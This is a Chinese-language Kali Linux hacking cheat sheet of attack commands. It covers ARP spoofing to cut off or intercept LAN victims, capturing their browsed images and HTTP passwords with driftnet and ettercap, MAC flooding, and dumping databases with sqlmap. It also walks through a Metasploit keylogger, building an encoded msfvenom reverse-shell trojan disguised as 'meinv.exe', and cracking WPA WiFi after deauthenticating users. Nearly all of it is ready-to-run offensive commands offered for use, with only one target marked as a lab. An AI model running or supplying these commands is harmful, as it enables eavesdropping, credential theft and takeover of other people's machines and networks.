局域网断网攻击
使用Arpspoof
Arpspoof -i 网卡 -t 目标IP 网关
例如 kali:网卡eth0 目标ip:192.168.1.100 网关:192.168.1.1
那么就是 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
局域网获取他人图片
首先进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward 意思让别人通过我们的网卡上网
然后使用 arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
成功欺骗
使用driftnet --> 获取图片
driftnet -i eth0 出现窗口 可以在窗口内看到欺骗对象正在浏览的图片
综合应用之HTTP账号密码获取
实验需要用到ettercap工具
首先进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward
欺骗ip arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
在这个基础上使用sttercap
ettercap -Tq -i eth0
-Tq t启动文本模式,q安静模式 -i 网卡
这个时候对方登录是 我们这里将会获得对方输入的账号密码
如果账号是中文,又可以会出现url编码,这个时候去百度在线url解码就可以了。
MAC地址泛洪攻击:macof
sql注入:
1.寻找注入点并检测待攻击目标的各种参数和属性
sqlmap -u “网站链接”
2.扫描数据库
sqlmap -u “网站链接” --tables
3.扫描表
sqlmap -u “网站链接” -D 数据库名(test) --tables
4.扫描字段(几列)
sqlmap -u “网站链接” -D 数据库名 -T 表名(“admin”) --columns
5.显示内容
sqlmap -u “网站链接” -D 数据库名 -T 表名 -C 字段(列名)(“username”) -dump
靶机:http://ctf5.shiyanbar.com/8/index.php?id=1
XSS跨站脚本攻击:
1.启动msf并搜索keylogger攻击工具(search keylogger)
use ***
2.显示参数使用该工具(进入该工具子菜单环境)并显示参数(show options)
3.设置参数
set DEMO true DMEO=>true
set SRVHOST 192.168.6.115 (攻击者) SRVHOST => 192.168.6.115
set SRVPORT 80 SRVPORT => 80
设置路径,默认路径随机生成
set URIPATH / URIPATH => /
最后显示所有参数
show options
执行攻击:exploit,等待用户
木马:
使用kali生成木马并执行
攻击机:... 受害者*...*
1.使用kali生成木马程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i
5 -b ‘\x00’ LHOST=... LPOPT=4444 -f exe > meinv.exe
2.打开msf进行攻击
use exploit/multi/handler
3.设置payload 和 参数 并执行攻击
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ...(攻击者)
执行攻击: exploit
shell
wifi破解
第一步(iwconfig查看加载的网卡)
第二步:开启网卡的监听模式
airmon-ng start wlan0
第三步:扫描附近的WIFI
airodump-ng wlan0mon
第四步:抓包
airodump-ng -c * --bssid *** -w hack wlan0mon
第五步抓包成功
第六步:不成功,把对方踢下线
aireplay-ng -0 10 -a *** -c *** wlan0mon
第七部:(新开页面)破解WIFI
aircrack-ng -a2 -b *** -w pass.txt